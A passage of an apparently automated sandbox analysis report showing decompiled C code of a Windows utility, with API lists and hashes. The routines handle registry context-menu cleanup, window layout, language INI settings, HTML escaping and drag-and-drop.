                                                                                                  				signed int _t28;
                                                                                                  				void* _t34;
                                                                                                  
                                                                                                  				E0040B550(0x1004, __ecx);
                                                                                                  				_t36 = 0;
                                                                                                  				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                                  					_v2056 = 0;
                                                                                                  					memset( &_v2054, 0, 0x7fe);
                                                                                                  					_v4104 = 0;
                                                                                                  					memset( &_v4102, 0, 0x7fe);
                                                                                                  					_t34 = __ebx + 0x20a;
                                                                                                  					_push(_t34);
                                                                                                  					_push(__ebx);
                                                                                                  					_push(L"%s\\shell\\%s\\command");
                                                                                                  					_push(0x3ff);
                                                                                                  					_push( &_v2056);
                                                                                                  					L0040B1EC();
                                                                                                  					_push(_t34);
                                                                                                  					_push(__ebx);
                                                                                                  					_push(L"%s\\shell\\%s");
                                                                                                  					_push(0x3ff);
                                                                                                  					_push( &_v4104);
                                                                                                  					L0040B1EC();
                                                                                                  					RegDeleteKeyW(_v8,  &_v2056);
                                                                                                  					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                                  					asm("sbb esi, esi");
                                                                                                  					_t36 =  ~_t28 + 1;
                                                                                                  					RegCloseKey(_v8);
                                                                                                  				}
                                                                                                  				return _t36;
                                                                                                  			}










                                                                                                  0x004045c2
                                                                                                  0x004045d1
                                                                                                  0x004045da
                                                                                                  0x004045ef
                                                                                                  0x004045f6
                                                                                                  0x00404604
                                                                                                  0x0040460b
                                                                                                  0x00404610
                                                                                                  0x00404616
                                                                                                  0x00404617
                                                                                                  0x00404618
                                                                                                  0x00404628
                                                                                                  0x00404629
                                                                                                  0x0040462a
                                                                                                  0x0040462f
                                                                                                  0x00404630
                                                                                                  0x00404631
                                                                                                  0x0040463c
                                                                                                  0x0040463d
                                                                                                  0x0040463e
                                                                                                  0x00404656
                                                                                                  0x00404662
                                                                                                  0x0040466b
                                                                                                  0x0040466d
                                                                                                  0x0040466e
                                                                                                  0x00404674
                                                                                                  0x00404679

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Delete_snwprintfmemset$Close
                                                                                                  • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                  • API String ID: 1018939227-3575174989
                                                                                                  • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                  • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                  • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                  • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 58%
                                                                                                  			E0040313D(void* __ecx) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v12;
                                                                                                  				struct HWND__* _t6;
                                                                                                  				_Unknown_base(*)()* _t11;
                                                                                                  				struct HWND__* _t15;
                                                                                                  				void* _t20;
                                                                                                  				struct HINSTANCE__* _t23;
                                                                                                  
                                                                                                  				_v12 = 8;
                                                                                                  				_v8 = 0xff;
                                                                                                  				_t15 = 0;
                                                                                                  				_t20 = 0;
                                                                                                  				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                  				if(_t23 == 0) {
                                                                                                  					L5:
                                                                                                  					__imp__#17();
                                                                                                  					_t6 = 1;
                                                                                                  					L6:
                                                                                                  					if(_t6 != 0) {
                                                                                                  						return 1;
                                                                                                  					} else {
                                                                                                  						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                  						return 0;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                  				if(_t11 != 0) {
                                                                                                  					_t20 = 1;
                                                                                                  					_t15 =  *_t11( &_v12);
                                                                                                  				}
                                                                                                  				FreeLibrary(_t23);
                                                                                                  				if(_t20 == 0) {
                                                                                                  					goto L5;
                                                                                                  				} else {
                                                                                                  					_t6 = _t15;
                                                                                                  					goto L6;
                                                                                                  				}
                                                                                                  			}










                                                                                                  0x0040314a
                                                                                                  0x00403151
                                                                                                  0x00403158
                                                                                                  0x0040315a
                                                                                                  0x00403162
                                                                                                  0x00403166
                                                                                                  0x00403190
                                                                                                  0x00403190
                                                                                                  0x00403198
                                                                                                  0x00403199
                                                                                                  0x0040319e
                                                                                                  0x004031bb
                                                                                                  0x004031a0
                                                                                                  0x004031ad
                                                                                                  0x004031b6
                                                                                                  0x004031b6
                                                                                                  0x0040319e
                                                                                                  0x0040316e
                                                                                                  0x00403176
                                                                                                  0x0040317c
                                                                                                  0x0040317f
                                                                                                  0x0040317f
                                                                                                  0x00403182
                                                                                                  0x0040318a
                                                                                                  0x00000000
                                                                                                  0x0040318c
                                                                                                  0x0040318c
                                                                                                  0x00000000
                                                                                                  0x0040318c

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                  • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                  • API String ID: 2780580303-317687271
                                                                                                  • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                  • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                  • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                  • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                  				struct HWND__* _v8;
                                                                                                  				struct HWND__* _v12;
                                                                                                  				struct tagRECT _v28;
                                                                                                  				struct tagRECT _v44;
                                                                                                  				int _t50;
                                                                                                  				long _t61;
                                                                                                  				struct HDC__* _t63;
                                                                                                  				intOrPtr _t65;
                                                                                                  				intOrPtr _t68;
                                                                                                  				struct HWND__* _t71;
                                                                                                  				intOrPtr _t72;
                                                                                                  				void* _t73;
                                                                                                  				int _t74;
                                                                                                  				int _t80;
                                                                                                  				int _t83;
                                                                                                  
                                                                                                  				_t73 = __edx;
                                                                                                  				_v8 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				_t74 = GetSystemMetrics(0x11);
                                                                                                  				_t80 = GetSystemMetrics(0x10);
                                                                                                  				if(_t74 == 0 || _t80 == 0) {
                                                                                                  					_t63 = GetDC(0);
                                                                                                  					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                  					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                  					ReleaseDC(0, _t63);
                                                                                                  				}
                                                                                                  				GetWindowRect(_a4,  &_v44);
                                                                                                  				if((_a8 & 0x00000004) != 0) {
                                                                                                  					_t71 = GetParent(_a4);
                                                                                                  					if(_t71 != 0) {
                                                                                                  						_v28.left = _v28.left & 0x00000000;
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosd");
                                                                                                  						GetWindowRect(_t71,  &_v28);
                                                                                                  						_t61 = _v28.left;
                                                                                                  						_t72 = _v28.top;
                                                                                                  						_t80 = _v28.right - _t61 + 1;
                                                                                                  						_t74 = _v28.bottom - _t72 + 1;
                                                                                                  						_v8 = _t61;
                                                                                                  						_v12 = _t72;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t65 = _v44.right;
                                                                                                  				if((_a8 & 0x00000001) == 0) {
                                                                                                  					asm("cdq");
                                                                                                  					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                  				} else {
                                                                                                  					_t83 = 0;
                                                                                                  				}
                                                                                                  				_t68 = _v44.bottom;
                                                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                                                  					L11:
                                                                                                  					_t50 = 0;
                                                                                                  					goto L12;
                                                                                                  				} else {
                                                                                                  					asm("cdq");
                                                                                                  					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                  					if(_t50 >= 0) {
                                                                                                  						L12:
                                                                                                  						if(_t83 < 0) {
                                                                                                  							_t83 = 0;
                                                                                                  						}
                                                                                                  						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                  					}
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  			}


















                                                                                                  0x00404da9
                                                                                                  0x00404dbc
                                                                                                  0x00404dbf
                                                                                                  0x00404dc6
                                                                                                  0x00404dcc
                                                                                                  0x00404dce
                                                                                                  0x00404de1
                                                                                                  0x00404deb
                                                                                                  0x00404df2
                                                                                                  0x00404df4
                                                                                                  0x00404df4
                                                                                                  0x00404e07
                                                                                                  0x00404e0d
                                                                                                  0x00404e18
                                                                                                  0x00404e1c
                                                                                                  0x00404e1e
                                                                                                  0x00404e27
                                                                                                  0x00404e28
                                                                                                  0x00404e29
                                                                                                  0x00404e2f
                                                                                                  0x00404e31
                                                                                                  0x00404e37
                                                                                                  0x00404e41
                                                                                                  0x00404e42
                                                                                                  0x00404e43
                                                                                                  0x00404e46
                                                                                                  0x00404e46
                                                                                                  0x00404e1c
                                                                                                  0x00404e4d
                                                                                                  0x00404e50
                                                                                                  0x00404e5f
                                                                                                  0x00404e66
                                                                                                  0x00404e52
                                                                                                  0x00404e52
                                                                                                  0x00404e52
                                                                                                  0x00404e6d
                                                                                                  0x00404e70
                                                                                                  0x00404e85
                                                                                                  0x00404e85
                                                                                                  0x00000000
                                                                                                  0x00404e72
                                                                                                  0x00404e7b
                                                                                                  0x00404e80
                                                                                                  0x00404e83
                                                                                                  0x00404e87
                                                                                                  0x00404e89
                                                                                                  0x00404e8b
                                                                                                  0x00404e8b
                                                                                                  0x00404ea8
                                                                                                  0x00404ea8
                                                                                                  0x00000000
                                                                                                  0x00404e83

                                                                                                  APIs
                                                                                                  • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                  • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                  • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                  • ReleaseDC.USER32 ref: 00404DF4
                                                                                                  • GetWindowRect.USER32 ref: 00404E07
                                                                                                  • GetParent.USER32(?), ref: 00404E12
                                                                                                  • GetWindowRect.USER32 ref: 00404E2F
                                                                                                  • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 2163313125-0
                                                                                                  • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                  • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                  • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                  • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 88%
                                                                                                  			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                                  				void* __esi;
                                                                                                  				void* _t3;
                                                                                                  				int _t6;
                                                                                                  
                                                                                                  				_t3 = E00404AAA(_a4);
                                                                                                  				if(_t3 != 0) {
                                                                                                  					wcscpy(0x40fb90, _a4);
                                                                                                  					wcscpy(0x40fda0, L"general");
                                                                                                  					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                                  					asm("sbb eax, eax");
                                                                                                  					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                                  					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                                  					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                                  					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                                  				}
                                                                                                  				return _t3;
                                                                                                  			}






                                                                                                  0x0040639c
                                                                                                  0x004063a4
                                                                                                  0x004063b2
                                                                                                  0x004063c2
                                                                                                  0x004063d3
                                                                                                  0x004063dc
                                                                                                  0x004063eb
                                                                                                  0x004063f0
                                                                                                  0x00406401
                                                                                                  0x00000000
                                                                                                  0x0040641e
                                                                                                  0x0040641f

                                                                                                  APIs
                                                                                                    • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                  • wcscpy.MSVCRT ref: 004063B2
                                                                                                  • wcscpy.MSVCRT ref: 004063C2
                                                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                    • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                  • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                  • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                  • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                  • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 16%
                                                                                                  			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                                  				void* _t2;
                                                                                                  				signed short* _t3;
                                                                                                  				void* _t7;
                                                                                                  				void* _t8;
                                                                                                  				void* _t10;
                                                                                                  
                                                                                                  				_t3 = __eax;
                                                                                                  				_t8 = __ecx;
                                                                                                  				_t7 = 8;
                                                                                                  				while(1) {
                                                                                                  					_t2 =  *_t3 & 0x0000ffff;
                                                                                                  					if(_t2 != 0x3c) {
                                                                                                  						goto L3;
                                                                                                  					}
                                                                                                  					_push(_t7);
                                                                                                  					_push(L"&lt;");
                                                                                                  					L14:
                                                                                                  					_t2 = memcpy(_t8, ??, ??);
                                                                                                  					_t10 = _t10 + 0xc;
                                                                                                  					_t8 = _t8 + _t7;
                                                                                                  					L16:
                                                                                                  					if( *_t3 != 0) {
                                                                                                  						_t3 =  &(_t3[1]);
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					return _t2;
                                                                                                  					L3:
                                                                                                  					if(_t2 != 0x3e) {
                                                                                                  						if(_t2 != 0x22) {
                                                                                                  							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                  								if(_t2 != 0x26) {
                                                                                                  									if(_t2 != 0xa) {
                                                                                                  										 *_t8 = _t2;
                                                                                                  										_t8 = _t8 + 2;
                                                                                                  									} else {
                                                                                                  										_push(_t7);
                                                                                                  										_push(L"<br>");
                                                                                                  										goto L14;
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									_push(0xa);
                                                                                                  									_push(L"&amp;");
                                                                                                  									goto L11;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_push(0xa);
                                                                                                  								_push(L"&deg;");
                                                                                                  								L11:
                                                                                                  								_t2 = memcpy(_t8, ??, ??);
                                                                                                  								_t10 = _t10 + 0xc;
                                                                                                  								_t8 = _t8 + 0xa;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                  							_t10 = _t10 + 0xc;
                                                                                                  							_t8 = _t8 + 0xc;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_push(_t7);
                                                                                                  						_push(L"&gt;");
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  					goto L16;
                                                                                                  				}
                                                                                                  			}








                                                                                                  0x0040adf6
                                                                                                  0x0040adf8
                                                                                                  0x0040adfa
                                                                                                  0x0040adfb
                                                                                                  0x0040adfb
                                                                                                  0x0040ae02
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040ae04
                                                                                                  0x0040ae05
                                                                                                  0x0040ae6d
                                                                                                  0x0040ae6e
                                                                                                  0x0040ae73
                                                                                                  0x0040ae76
                                                                                                  0x0040ae7f
                                                                                                  0x0040ae83
                                                                                                  0x0040ae86
                                                                                                  0x00000000
                                                                                                  0x0040ae86
                                                                                                  0x0040ae8f
                                                                                                  0x0040ae0c
                                                                                                  0x0040ae10
                                                                                                  0x0040ae1e
                                                                                                  0x0040ae3b
                                                                                                  0x0040ae4a
                                                                                                  0x0040ae65
                                                                                                  0x0040ae7a
                                                                                                  0x0040ae7e
                                                                                                  0x0040ae67
                                                                                                  0x0040ae67
                                                                                                  0x0040ae68
                                                                                                  0x00000000
                                                                                                  0x0040ae68
                                                                                                  0x0040ae4c
                                                                                                  0x0040ae4c
                                                                                                  0x0040ae4e
                                                                                                  0x00000000
                                                                                                  0x0040ae4e
                                                                                                  0x0040ae3d
                                                                                                  0x0040ae3d
                                                                                                  0x0040ae3f
                                                                                                  0x0040ae53
                                                                                                  0x0040ae54
                                                                                                  0x0040ae59
                                                                                                  0x0040ae5c
                                                                                                  0x0040ae5c
                                                                                                  0x0040ae20
                                                                                                  0x0040ae28
                                                                                                  0x0040ae2d
                                                                                                  0x0040ae30
                                                                                                  0x0040ae30
                                                                                                  0x0040ae12
                                                                                                  0x0040ae12
                                                                                                  0x0040ae13
                                                                                                  0x00000000
                                                                                                  0x0040ae13
                                                                                                  0x00000000
                                                                                                  0x0040ae10

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpy
                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                  • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                  • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                  • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                  • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                  				struct HDWP__* _v8;
                                                                                                  				intOrPtr* _v12;
                                                                                                  				void _v534;
                                                                                                  				short _v536;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				intOrPtr _t42;
                                                                                                  				intOrPtr* _t95;
                                                                                                  				RECT* _t96;
                                                                                                  
                                                                                                  				_t95 = __ecx;
                                                                                                  				_v12 = __ecx;
                                                                                                  				if(_a4 == 0x233) {
                                                                                                  					_v536 = 0;
                                                                                                  					memset( &_v534, 0, 0x208);
                                                                                                  					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                                  					DragFinish(_a8);
                                                                                                  					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                                  					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                                  					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                                  					_t95 = _v12;
                                                                                                  				}
                                                                                                  				if(_a4 != 5) {
                                                                                                  					if(_a4 != 0xf) {
                                                                                                  						if(_a4 == 0x24) {
                                                                                                  							_t42 = _a12;
                                                                                                  							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                                  							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						E00402EC8(_t95 + 0x40);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_v8 = BeginDeferWindowPos(0xd);
                                                                                                  					_t96 = _t95 + 0x40;
                                                                                                  					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                                  					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                                  					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                                  					EndDeferWindowPos(_v8);
                                                                                                  					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                                  					_t95 = _v12;
                                                                                                  				}
                                                                                                  				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                                  			}












                                                                                                  0x004041f9
                                                                                                  0x00404205
                                                                                                  0x00404208
                                                                                                  0x00404217
                                                                                                  0x0040421e
                                                                                                  0x00404236
                                                                                                  0x0040423f
                                                                                                  0x0040424a
                                                                                                  0x0040425f
                                                                                                  0x0040426b
                                                                                                  0x0040426e
                                                                                                  0x0040426e
                                                                                                  0x00404275
                                                                                                  0x004043be
                                                                                                  0x004043ce
                                                                                                  0x004043d0
                                                                                                  0x004043d3
                                                                                                  0x004043da
                                                                                                  0x004043da
                                                                                                  0x004043c0
                                                                                                  0x004043c3
                                                                                                  0x004043c3
                                                                                                  0x0040427b
                                                                                                  0x0040428c
                                                                                                  0x0040428f
                                                                                                  0x00404295
                                                                                                  0x004042a5
                                                                                                  0x004042b8
                                                                                                  0x004042cb
                                                                                                  0x004042de
                                                                                                  0x004042f1
                                                                                                  0x00404304
                                                                                                  0x00404317
                                                                                                  0x0040432a
                                                                                                  0x0040433d
                                                                                                  0x00404350
                                                                                                  0x00404363
                                                                                                  0x00404376
                                                                                                  0x00404389
                                                                                                  0x0040439c
                                                                                                  0x004043a4
                                                                                                  0x004043af
                                                                                                  0x004043b5
                                                                                                  0x004043b5
                                                                                                  0x004043f5

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040421E
                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                  • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                  • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                  • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                  • String ID: $
                                                                                                  • API String ID: 2142561256-3993045852
                                                                                                  • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                  • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                  • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                  • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 55%
                                                                                                  			E00405B81(signed short __ebx) {
                                                                                                  				signed int _t21;
                                                                                                  				void* _t22;
                                                                                                  				struct HINSTANCE__* _t25;
                                                                                                  				signed int _t27;
                                                                                                  				void* _t35;
                                                                                                  				signed short _t39;
                                                                                                  				signed int _t40;
                                                                                                  				void* _t57;
                                                                                                  				int _t61;
                                                                                                  				void* _t62;
                                                                                                  				int _t71;
                                                                                                  
                                                                                                  				_t39 = __ebx;
                                                                                                  				if( *0x41c470 == 0) {
                                                                                                  					E00405ADF();
                                                                                                  				}
                                                                                                  				_t40 =  *0x41c468;
                                                                                                  				_t21 = 0;
                                                                                                  				if(_t40 <= 0) {
                                                                                                  					L5:
                                                                                                  					_t57 = 0;
                                                                                                  				} else {
                                                                                                  					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
